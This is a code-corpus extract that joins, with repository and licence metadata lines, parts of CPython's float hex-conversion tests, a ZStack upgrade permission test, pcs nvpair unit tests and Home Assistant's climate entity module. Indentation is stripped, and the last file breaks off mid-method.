self.identical(fromHex('0x0.fffffffffffffdp0'), 1.0)
self.identical(fromHex('0X0.fffffffffffffep0'), 1.0)
self.identical(fromHex('0x0.ffffffffffffffp0'), 1.0)
self.identical(fromHex('0X1.00000000000000p0'), 1.0)
self.identical(fromHex('0X1.00000000000001p0'), 1.0)
self.identical(fromHex('0x1.00000000000002p0'), 1.0)
self.identical(fromHex('0X1.00000000000003p0'), 1.0)
self.identical(fromHex('0x1.00000000000004p0'), 1.0)
self.identical(fromHex('0X1.00000000000005p0'), 1.0)
self.identical(fromHex('0X1.00000000000006p0'), 1.0)
self.identical(fromHex('0X1.00000000000007p0'), 1.0)
self.identical(fromHex('0x1.00000000000007ffffffffffffffffffffp0'),
1.0)
self.identical(fromHex('0x1.00000000000008p0'), 1.0)
self.identical(fromHex('0x1.00000000000008000000000000000001p0'),
1+EPS)
self.identical(fromHex('0X1.00000000000009p0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000ap0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000bp0'), 1.0+EPS)
self.identical(fromHex('0X1.0000000000000cp0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000dp0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000ep0'), 1.0+EPS)
self.identical(fromHex('0X1.0000000000000fp0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000010p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000011p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000012p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000013p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000014p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000015p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000016p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000017p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000017ffffffffffffffffffffp0'),
1.0+EPS)
self.identical(fromHex('0x1.00000000000018p0'), 1.0+2*EPS)
self.identical(fromHex('0X1.00000000000018000000000000000001p0'),
1.0+2*EPS)
self.identical(fromHex('0x1.00000000000019p0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001ap0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001bp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001cp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001dp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001ep0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001fp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.00000000000020p0'), 1.0+2*EPS)
def test_roundtrip(self):
def roundtrip(x):
return fromHex(toHex(x))
for x in [NAN, INF, self.MAX, self.MIN, self.MIN-self.TINY, self.TINY, 0.0]:
self.identical(x, roundtrip(x))
self.identical(-x, roundtrip(-x))
# fromHex(toHex(x)) should exactly recover x, for any non-NaN float x.
import random
for i in xrange(10000):
e = random.randrange(-1200, 1200)
m = random.random()
s = random.choice([1.0, -1.0])
try:
x = s*ldexp(m, e)
except OverflowError:
pass
else:
self.identical(x, fromHex(toHex(x)))
def test_main():
test_support.run_unittest(
GeneralFloatCases,
FormatFunctionsTestCase,
UnknownFormatTestCase,
IEEEFormatTestCase,
ReprTestCase,
InfNanTest,
HexFloatTestCase,
)
if __name__ == '__main__':
test_main()
| lgpl-2.1 |
zstackio/zstack-woodpecker | integrationtest/vm/installation/api_perimission_check/test_zs_upgd_3.5.2_latest_on_cos74_22976.py | 1 | 2730 | '''
#Cover 22976
Based on test_zs_upgd_3.5.2_latest_on_cos74.py.
Test the upgrade from 3.5.2.53 to the latest master & check API permissions.
@author: Zhaohao
'''
import os
import tempfile
import uuid
import time
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstacklib.utils.ssh as ssh
import zstackwoodpecker.operations.scenario_operations as scen_ops
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
vm_inv = None
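# Overall flow: bring up a 3.5.2 MN inside a scenario VM, snapshot the vid's
# API permissions, upgrade ZStack to the latest build, then verify the
# permissions survived the upgrade.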
def test():
global vm_inv
test_util.test_dsc('Create test vm to test zstack upgrade by -u.')
image_name = os.environ.get('imageNameBase_352_mn_c74')
c74_iso_path = os.environ.get('c74_iso_path')
#iso_21_path = os.environ.get('iso_21_path')
zstack_latest_version = os.environ.get('zstackLatestVersion')
zstack_latest_path = os.environ.get('zstackLatestInstaller')
vm_name = os.environ.get('vmName')
upgrade_script_path = os.environ.get('upgradeScript')
vm_inv = test_stub.create_vm_scenario(image_name, vm_name)
vm_ip = vm_inv.vmNics[0].ip
test_lib.lib_wait_target_up(vm_ip, 22)
test_stub.make_ssh_no_password(vm_ip, tmp_file)
test_util.test_logger('Update MN IP')
test_stub.update_mn_hostname(vm_ip, tmp_file)
test_stub.update_mn_ip(vm_ip, tmp_file)
test_stub.stop_mn(vm_ip, tmp_file)
test_stub.start_node(vm_ip, tmp_file)
test_stub.start_mn(vm_ip, tmp_file)
test_stub.check_mn_running(vm_ip, tmp_file)
test_stub.create_vid(vm_ip, 'vid_test')
pms1 = test_stub.get_vid_permissions(vm_ip, 'vid_test')
#test_stub.check_installation(vm_ip, tmp_file)
test_util.test_logger('Upgrade zstack to latest')
test_stub.update_c74_iso(vm_ip, tmp_file, c74_iso_path, upgrade_script_path)
#test_stub.updatei_21_iso(vm_ip, tmp_file, iso_21_path, upgrade_script_path)
test_stub.upgrade_zstack(vm_ip, zstack_latest_path, tmp_file)
test_stub.check_zstack_version(vm_ip, tmp_file, zstack_latest_version)
test_stub.start_mn(vm_ip, tmp_file)
test_stub.check_mn_running(vm_ip, tmp_file)
pms2 = test_stub.get_vid_permissions(vm_ip, 'vid_test')
test_stub.check_permissions(pms1, pms2)
#test_stub.check_installation(vm_ip, tmp_file)
os.system('rm -f %s' % tmp_file)
test_stub.destroy_vm_scenario(vm_inv.uuid)
test_util.test_pass('ZStack 3.5.2 to master upgrade Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global vm_inv
os.system('rm -f %s' % tmp_file)
if vm_inv:
test_stub.destroy_vm_scenario(vm_inv.uuid)
test_lib.lib_error_cleanup(test_obj_dict)
| apache-2.0 |
ClusterLabs/pcs | pcs_test/tier0/lib/cib/test_nvpair.py | 3 | 16477 | from unittest import TestCase
from lxml import etree
from pcs_test.tools.assertions import assert_xml_equal
from pcs_test.tools.xml import etree_to_str
from pcs.lib.cib import nvpair
from pcs.lib.cib.tools import IdProvider
# pylint: disable=no-self-use, protected-access
class AppendNewNvpair(TestCase):
def test_append_new_nvpair_to_given_element(self):
nvset_element = etree.fromstring('<nvset id="a"/>')
id_provider = IdProvider(nvset_element)
nvpair._append_new_nvpair(nvset_element, "b", "c", id_provider)
assert_xml_equal(
etree_to_str(nvset_element),
"""
<nvset id="a">
<nvpair id="a-b" name="b" value="c"></nvpair>
</nvset>
""",
)
def test_with_id_provider(self):
nvset_element = etree.fromstring('<nvset id="a"/>')
provider = IdProvider(nvset_element)
provider.book_ids("a-b")
nvpair._append_new_nvpair(nvset_element, "b", "c", provider)
assert_xml_equal(
etree_to_str(nvset_element),
"""
<nvset id="a">
<nvpair id="a-b-1" name="b" value="c"></nvpair>
</nvset>
""",
)
class UpdateNvsetTest(TestCase):
def test_updates_nvset(self):
nvset_element = etree.fromstring(
"""
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="b"/>
<nvpair id="iattrs-c" name="c" value="d"/>
<nvpair id="iattrs-e" name="e" value="f"/>
</instance_attributes>
"""
)
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(
nvset_element,
{
"a": "B",
"c": "",
"g": "h",
},
id_provider,
)
assert_xml_equal(
"""
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="B"/>
<nvpair id="iattrs-e" name="e" value="f"/>
<nvpair id="iattrs-g" name="g" value="h"/>
</instance_attributes>
""",
etree_to_str(nvset_element),
)
def test_empty_value_has_no_effect(self):
xml = """
<instance_attributes id="iattrs">
<nvpair id="iattrs-b" name="a" value="b"/>
<nvpair id="iattrs-d" name="c" value="d"/>
<nvpair id="iattrs-f" name="e" value="f"/>
</instance_attributes>
"""
nvset_element = etree.fromstring(xml)
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(nvset_element, {}, id_provider)
assert_xml_equal(xml, etree_to_str(nvset_element))
def test_keep_empty_nvset(self):
xml_pre = """
<resource>
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="b"/>
</instance_attributes>
</resource>
"""
xml_post = """
<resource>
<instance_attributes id="iattrs" />
</resource>
"""
xml = etree.fromstring(xml_pre)
nvset_element = xml.find("instance_attributes")
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(nvset_element, {"a": ""}, id_provider)
assert_xml_equal(xml_post, etree_to_str(xml))
class SetNvpairInNvsetTest(TestCase):
def setUp(self):
self.nvset = etree.Element("nvset", id="nvset")
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr", name="attr", value="1"
)
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr2", name="attr2", value="2"
)
etree.SubElement(
self.nvset, "notnvpair", id="nvset-test", name="test", value="0"
)
self.id_provider = IdProvider(self.nvset)
def test_update(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr", "10", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="10"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_add(self):
nvpair.set_nvpair_in_nvset(self.nvset, "test", "0", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
<nvpair id="nvset-test-1" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_remove(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr2", "", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_remove_not_existing(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr3", "", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
class AppendNewNvsetTest(TestCase):
def test_append_new_nvset_to_given_element(self):
context_element = etree.fromstring('<context id="a"/>')
id_provider = IdProvider(context_element)
nvpair.append_new_nvset(
"instance_attributes",
context_element,
{
"a": "b",
"c": "d",
},
id_provider,
)
assert_xml_equal(
"""
<context id="a">
<instance_attributes id="a-instance_attributes">
<nvpair
id="a-instance_attributes-a" name="a" value="b"
/>
<nvpair
id="a-instance_attributes-c" name="c" value="d"
/>
</instance_attributes>
</context>
""",
etree_to_str(context_element),
)
def test_with_id_provider_booked_ids(self):
context_element = etree.fromstring('<context id="a"/>')
provider = IdProvider(context_element)
provider.book_ids("a-instance_attributes", "a-instance_attributes-1-a")
nvpair.append_new_nvset(
"instance_attributes",
context_element,
{
"a": "b",
"c": "d",
},
provider,
)
assert_xml_equal(
"""
<context id="a">
<instance_attributes id="a-instance_attributes-1">
<nvpair
id="a-instance_attributes-1-a-1" name="a" value="b"
/>
<nvpair
id="a-instance_attributes-1-c" name="c" value="d"
/>
</instance_attributes>
</context>
""",
etree_to_str(context_element),
)
class ArrangeFirstNvsetTest(TestCase):
def setUp(self):
self.root = etree.Element("root", id="root")
self.nvset = etree.SubElement(self.root, "nvset", id="nvset")
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr", name="attr", value="1"
)
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr2", name="attr2", value="2"
)
etree.SubElement(
self.nvset, "notnvpair", id="nvset-test", name="test", value="0"
)
self.id_provider = IdProvider(self.nvset)
def test_empty_value_has_no_effect(self):
nvpair.arrange_first_nvset("nvset", self.root, {}, self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_update_existing_nvset(self):
nvpair.arrange_first_nvset(
"nvset",
self.root,
{"attr": "10", "new_one": "20", "test": "0", "attr2": ""},
self.id_provider,
)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="10"/>
<notnvpair id="nvset-test" name="test" value="0"/>
<nvpair id="nvset-new_one" name="new_one" value="20"/>
<nvpair id="nvset-test-1" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_create_new_nvset_if_does_not_exist(self):
root = etree.Element("root", id="root")
nvpair.arrange_first_nvset(
"nvset",
root,
{"attr": "10", "new_one": "20", "test": "0", "attr2": ""},
self.id_provider,
)
assert_xml_equal(
"""
<root id="root">
<nvset id="root-nvset">
<nvpair id="root-nvset-attr" name="attr" value="10"/>
<nvpair id="root-nvset-new_one" name="new_one" value="20"/>
<nvpair id="root-nvset-test" name="test" value="0"/>
</nvset>
</root>
""",
etree_to_str(root),
)
class GetNvsetTest(TestCase):
def test_success(self):
nvset = etree.XML(
"""
<nvset>
<nvpair id="nvset-name1" name="name1" value="value1"/>
<nvpair id="nvset-name2" name="name2" value="value2"/>
<nvpair id="nvset-name3" name="name3"/>
</nvset>
"""
)
self.assertEqual(
[
{"id": "nvset-name1", "name": "name1", "value": "value1"},
{"id": "nvset-name2", "name": "name2", "value": "value2"},
{"id": "nvset-name3", "name": "name3", "value": ""},
],
nvpair.get_nvset(nvset),
)
class GetValue(TestCase):
def assert_find_value(self, tag_name, name, value, xml, default=None):
self.assertEqual(
value,
nvpair.get_value(tag_name, etree.fromstring(xml), name, default),
)
def test_return_value_when_name_exists(self):
self.assert_find_value(
"meta_attributes",
"SOME-NAME",
"some-value",
"""
<context>
<meta_attributes>
<nvpair name="SOME-NAME" value="some-value" />
<nvpair name="OTHER-NAME" value="other-value" />
</meta_attributes>
</context>
""",
)
def test_return_none_when_name_not_exists(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
<instance_attributes>
<nvpair name="another-name" value="some-value" />
</instance_attributes>
</context>
""",
)
def test_return_default_when_name_not_exists(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value="DEFAULT",
xml="""
<context>
<instance_attributes>
<nvpair name="another-name" value="some-value" />
</instance_attributes>
</context>
""",
default="DEFAULT",
)
def test_return_none_when_no_nvpair(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
<instance_attributes />
</context>
""",
)
def test_return_none_when_no_nvset(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
</context>
""",
)
class GetNvsetAsDictTest(TestCase):
def test_no_element(self):
resource_element = etree.fromstring("<primitive/>")
self.assertEqual(
dict(),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_empty(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes/>
</primitive>
"""
)
self.assertEqual(
dict(),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_non_empty(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
</primitive>
"""
)
self.assertEqual(
dict(
attr_name="value",
other_name="other-value",
),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_multiple_nvsets(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
<meta_attributes>
<nvpair id="a" name="attr_name2" value="value2"/>
<nvpair id="b" name="other_name2" value="other-value2"/>
</meta_attributes>
</primitive>
"""
)
self.assertEqual(
dict(
attr_name="value",
other_name="other-value",
),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
class HasMetaAttribute(TestCase):
def test_return_false_if_does_not_have_such_attribute(self):
resource_element = etree.fromstring("""<primitive/>""")
self.assertFalse(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
def test_return_true_if_such_meta_attribute_exists(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
</primitive>
"""
)
self.assertTrue(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
def test_return_false_if_meta_attribute_exists_but_in_nested_element(self):
resource_element = etree.fromstring(
"""
<group>
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
</meta_attributes>
</primitive>
</group>
"""
)
self.assertFalse(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
| gpl-2.0 |
partofthething/home-assistant | homeassistant/components/climate/__init__.py | 16 | 16930 | """Provides functionality to interact with climate devices."""
from abc import abstractmethod
from datetime import timedelta
import functools as ft
import logging
from typing import Any, Dict, List, Optional
import voluptuous as vol
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_TENTHS,
PRECISION_WHOLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_ON,
TEMP_CELSIUS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
make_entity_service_schema,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.temperature import display_temp as show_temp
from homeassistant.helpers.typing import ConfigType, HomeAssistantType, ServiceDataType
from homeassistant.util.temperature import convert as convert_temperature
from .const import (
ATTR_AUX_HEAT,
ATTR_CURRENT_HUMIDITY,
ATTR_CURRENT_TEMPERATURE,
ATTR_FAN_MODE,
ATTR_FAN_MODES,
ATTR_HUMIDITY,
ATTR_HVAC_ACTION,
ATTR_HVAC_MODE,
ATTR_HVAC_MODES,
ATTR_MAX_HUMIDITY,
ATTR_MAX_TEMP,
ATTR_MIN_HUMIDITY,
ATTR_MIN_TEMP,
ATTR_PRESET_MODE,
ATTR_PRESET_MODES,
ATTR_SWING_MODE,
ATTR_SWING_MODES,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
ATTR_TARGET_TEMP_STEP,
DOMAIN,
HVAC_MODE_COOL,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
HVAC_MODES,
SERVICE_SET_AUX_HEAT,
SERVICE_SET_FAN_MODE,
SERVICE_SET_HUMIDITY,
SERVICE_SET_HVAC_MODE,
SERVICE_SET_PRESET_MODE,
SERVICE_SET_SWING_MODE,
SERVICE_SET_TEMPERATURE,
SUPPORT_AUX_HEAT,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_SWING_MODE,
SUPPORT_TARGET_HUMIDITY,
SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_RANGE,
)
DEFAULT_MIN_TEMP = 7
DEFAULT_MAX_TEMP = 35
DEFAULT_MIN_HUMIDITY = 30
DEFAULT_MAX_HUMIDITY = 99
ENTITY_ID_FORMAT = DOMAIN + ".{}"
SCAN_INTERVAL = timedelta(seconds=60)
CONVERTIBLE_ATTRIBUTE = [ATTR_TEMPERATURE, ATTR_TARGET_TEMP_LOW, ATTR_TARGET_TEMP_HIGH]
_LOGGER = logging.getLogger(__name__)
SET_TEMPERATURE_SCHEMA = vol.All(
cv.has_at_least_one_key(
ATTR_TEMPERATURE, ATTR_TARGET_TEMP_HIGH, ATTR_TARGET_TEMP_LOW
),
make_entity_service_schema(
{
vol.Exclusive(ATTR_TEMPERATURE, "temperature"): vol.Coerce(float),
vol.Inclusive(ATTR_TARGET_TEMP_HIGH, "temperature"): vol.Coerce(float),
vol.Inclusive(ATTR_TARGET_TEMP_LOW, "temperature"): vol.Coerce(float),
vol.Optional(ATTR_HVAC_MODE): vol.In(HVAC_MODES),
}
),
)
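# Illustrative payloads (a sketch, not part of the original module): the
# schema accepts either a single target temperature or an inclusive
# low/high pair, never both, plus an optional HVAC mode. Entity keys come
# from make_entity_service_schema; the entity id below is hypothetical.
#
#   SET_TEMPERATURE_SCHEMA({
#       "entity_id": "climate.living_room",
#       "temperature": 21.5,
#   })
#   SET_TEMPERATURE_SCHEMA({
#       "entity_id": "climate.living_room",
#       "target_temp_low": 18.0,
#       "target_temp_high": 24.0,
#       "hvac_mode": "heat_cool",
#   })
#   # Supplying "temperature" together with the range raises vol.Invalid,
#   # because they share the "temperature" exclusion group above.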
async def async_setup(hass: HomeAssistantType, config: ConfigType) -> bool:
"""Set up climate entities."""
component = hass.data[DOMAIN] = EntityComponent(
_LOGGER, DOMAIN, hass, SCAN_INTERVAL
)
await component.async_setup(config)
component.async_register_entity_service(SERVICE_TURN_ON, {}, "async_turn_on")
component.async_register_entity_service(SERVICE_TURN_OFF, {}, "async_turn_off")
component.async_register_entity_service(
SERVICE_SET_HVAC_MODE,
{vol.Required(ATTR_HVAC_MODE): vol.In(HVAC_MODES)},
"async_set_hvac_mode",
)
component.async_register_entity_service(
SERVICE_SET_PRESET_MODE,
{vol.Required(ATTR_PRESET_MODE): cv.string},
"async_set_preset_mode",
[SUPPORT_PRESET_MODE],
)
component.async_register_entity_service(
SERVICE_SET_AUX_HEAT,
{vol.Required(ATTR_AUX_HEAT): cv.boolean},
async_service_aux_heat,
[SUPPORT_AUX_HEAT],
)
component.async_register_entity_service(
SERVICE_SET_TEMPERATURE,
SET_TEMPERATURE_SCHEMA,
async_service_temperature_set,
[SUPPORT_TARGET_TEMPERATURE, SUPPORT_TARGET_TEMPERATURE_RANGE],
)
component.async_register_entity_service(
SERVICE_SET_HUMIDITY,
{vol.Required(ATTR_HUMIDITY): vol.Coerce(float)},
"async_set_humidity",
[SUPPORT_TARGET_HUMIDITY],
)
component.async_register_entity_service(
SERVICE_SET_FAN_MODE,
{vol.Required(ATTR_FAN_MODE): cv.string},
"async_set_fan_mode",
[SUPPORT_FAN_MODE],
)
component.async_register_entity_service(
SERVICE_SET_SWING_MODE,
{vol.Required(ATTR_SWING_MODE): cv.string},
"async_set_swing_mode",
[SUPPORT_SWING_MODE],
)
return True
async def async_setup_entry(hass: HomeAssistantType, entry):
"""Set up a config entry."""
return await hass.data[DOMAIN].async_setup_entry(entry)
async def async_unload_entry(hass: HomeAssistantType, entry):
"""Unload a config entry."""
return await hass.data[DOMAIN].async_unload_entry(entry)
class ClimateEntity(Entity):
"""Representation of a climate entity."""
@property
def state(self) -> str:
"""Return the current state."""
return self.hvac_mode
@property
def precision(self) -> float:
"""Return the precision of the system."""
if self.hass.config.units.temperature_unit == TEMP_CELSIUS:
return PRECISION_TENTHS
return PRECISION_WHOLE
@property
def capability_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the capability attributes."""
supported_features = self.supported_features
data = {
ATTR_HVAC_MODES: self.hvac_modes,
ATTR_MIN_TEMP: show_temp(
self.hass, self.min_temp, self.temperature_unit, self.precision
),
ATTR_MAX_TEMP: show_temp(
self.hass, self.max_temp, self.temperature_unit, self.precision
),
}
if self.target_temperature_step:
data[ATTR_TARGET_TEMP_STEP] = self.target_temperature_step
if supported_features & SUPPORT_TARGET_HUMIDITY:
data[ATTR_MIN_HUMIDITY] = self.min_humidity
data[ATTR_MAX_HUMIDITY] = self.max_humidity
if supported_features & SUPPORT_FAN_MODE:
data[ATTR_FAN_MODES] = self.fan_modes
if supported_features & SUPPORT_PRESET_MODE:
data[ATTR_PRESET_MODES] = self.preset_modes
if supported_features & SUPPORT_SWING_MODE:
data[ATTR_SWING_MODES] = self.swing_modes
return data
@property
def state_attributes(self) -> Dict[str, Any]:
"""Return the optional state attributes."""
supported_features = self.supported_features
data = {
ATTR_CURRENT_TEMPERATURE: show_temp(
self.hass,
self.current_temperature,
self.temperature_unit,
self.precision,
),
}
if supported_features & SUPPORT_TARGET_TEMPERATURE:
data[ATTR_TEMPERATURE] = show_temp(
self.hass,
self.target_temperature,
self.temperature_unit,
self.precision,
)
if supported_features & SUPPORT_TARGET_TEMPERATURE_RANGE:
data[ATTR_TARGET_TEMP_HIGH] = show_temp(
self.hass,
self.target_temperature_high,
self.temperature_unit,
self.precision,
)
data[ATTR_TARGET_TEMP_LOW] = show_temp(
self.hass,
self.target_temperature_low,
self.temperature_unit,
self.precision,
)
if self.current_humidity is not None:
data[ATTR_CURRENT_HUMIDITY] = self.current_humidity
if supported_features & SUPPORT_TARGET_HUMIDITY:
data[ATTR_HUMIDITY] = self.target_humidity
if supported_features & SUPPORT_FAN_MODE:
data[ATTR_FAN_MODE] = self.fan_mode
if self.hvac_action:
data[ATTR_HVAC_ACTION] = self.hvac_action
if supported_features & SUPPORT_PRESET_MODE:
data[ATTR_PRESET_MODE] = self.preset_mode
if supported_features & SUPPORT_SWING_MODE:
data[ATTR_SWING_MODE] = self.swing_mode
if supported_features & SUPPORT_AUX_HEAT:
data[ATTR_AUX_HEAT] = STATE_ON if self.is_aux_heat else STATE_OFF
return data
@property
def temperature_unit(self) -> str:
"""Return the unit of measurement used by the platform."""
raise NotImplementedError()
@property
def current_humidity(self) -> Optional[int]:
"""Return the current humidity."""
return None
@property
def target_humidity(self) -> Optional[int]:
"""Return the humidity we try to reach."""
return None
@property
@abstractmethod
def hvac_mode(self) -> str:
"""Return hvac operation ie. heat, cool mode.
Need to be one of HVAC_MODE_*.
"""
@property
@abstractmethod
def hvac_modes(self) -> List[str]:
"""Return the list of available hvac operation modes.
Need to be a subset of HVAC_MODES.
"""
@property
def hvac_action(self) -> Optional[str]:
"""Return the current running hvac operation if supported.
Need to be one of CURRENT_HVAC_*.
"""
return None
@property
def current_temperature(self) -> Optional[float]:
"""Return the current temperature."""
return None
@property
def target_temperature(self) -> Optional[float]:
"""Return the temperature we try to reach."""
return None
@property
def target_temperature_step(self) -> Optional[float]:
"""Return the supported step of target temperature."""
return None
@property
def target_temperature_high(self) -> Optional[float]:
"""Return the highbound target temperature we try to reach.
Requires SUPPORT_TARGET_TEMPERATURE_RANGE.
"""
raise NotImplementedError
@property
def target_temperature_low(self) -> Optional[float]:
"""Return the lowbound target temperature we try to reach.
Requires SUPPORT_TARGET_TEMPERATURE_RANGE.
"""
raise NotImplementedError
@property
def preset_mode(self) -> Optional[str]:
"""Return the current preset mode, e.g., home, away, temp.
Requires SUPPORT_PRESET_MODE.
"""
raise NotImplementedError
@property
def preset_modes(self) -> Optional[List[str]]:
"""Return a list of available preset modes.
Requires SUPPORT_PRESET_MODE.
"""
raise NotImplementedError
@property
def is_aux_heat(self) -> Optional[bool]:
"""Return true if aux heater.
Requires SUPPORT_AUX_HEAT.
"""
raise NotImplementedError
@property
def fan_mode(self) -> Optional[str]:
"""Return the fan setting.
Requires SUPPORT_FAN_MODE.
"""
raise NotImplementedError
@property
def fan_modes(self) -> Optional[List[str]]:
"""Return the list of available fan modes.
Requires SUPPORT_FAN_MODE.
"""
raise NotImplementedError
@property
def swing_mode(self) -> Optional[str]:
"""Return the swing setting.
Requires SUPPORT_SWING_MODE.
"""
raise NotImplementedError
@property
def swing_modes(self) -> Optional[List[str]]:
"""Return the list of available swing modes.
Requires SUPPORT_SWING_MODE.
"""
raise NotImplementedError
def set_temperature(self, **kwargs) -> None:
"""Set new target temperature."""
raise NotImplementedError()
async def async_set_temperature(self, **kwargs) -> None:
"""Set new target temperature."""
await self.hass.async_add_executor_job(
ft.partial(self.set_temperature, **kwargs)
)
def set_humidity(self, humidity: int) -> None:
"""Set new target humidity."""
raise NotImplementedError()
async def async_set_humidity(self, humidity: int) -> None:
"""Set new target humidity."""
await self.hass.async_add_executor_job(self.set_humidity, humidity)
def set_fan_mode(self, fan_mode: str) -> None:
"""Set new target fan mode."""
raise NotImplementedError()
async def async_set_fan_mode(self, fan_mode: str) -> None:
"""Set new target fan mode."""
await self.hass.async_add_executor_job(self.set_fan_mode, fan_mode)
def set_hvac_mode(self, hvac_mode: str) -> None:
"""Set new target hvac mode."""
raise NotImplementedError()
async def async_set_hvac_mode(self, hvac_mode: str) -> None:
"""Set new target hvac mode."""
await self.hass.async_add_executor_job(self.set_hvac_mode, hvac_mode)
def set_swing_mode(self, swing_mode: str) -> None:
"""Set new target swing operation."""
raise NotImplementedError()
async def async_set_swing_mode(self, swing_mode: str) -> None:
"""Set new target swing operation."""
await self.hass.async_add_executor_job(self.set_swing_mode, swing_mode)
def set_preset_mode(self, preset_mode: str) -> None:
"""Set new preset mode."""
raise NotImplementedError()
async def async_set_preset_mode(self, preset_mode: str) -> None:
"""Set new preset mode."""
await self.hass.async_add_executor_job(self.set_preset_mode, preset_mode)
def turn_aux_heat_on(self) -> None:
"""Turn auxiliary heater on."""
raise NotImplementedError()
async def async_turn_aux_heat_on(self) -> None:
"""Turn auxiliary heater on."""
await self.hass.async_add_executor_job(self.turn_aux_heat_on)
def turn_aux_heat_off(self) -> None:
"""Turn auxiliary heater off."""
raise NotImplementedError()
async def async_turn_aux_heat_off(self) -> None:
"""Turn auxiliary heater off."""
await self.hass.async_add_executor_job(self.turn_aux_heat_off)
async def async_turn_on(self) -> None:
